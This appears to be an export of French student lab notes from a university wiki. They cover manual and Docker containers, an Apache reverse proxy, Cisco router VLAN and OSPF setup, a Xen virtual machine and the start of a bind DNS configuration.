==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49089</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49089"/>
				<updated>2018-12-21T15:09:44Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* 3.4 Le routage de site (IPv6) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
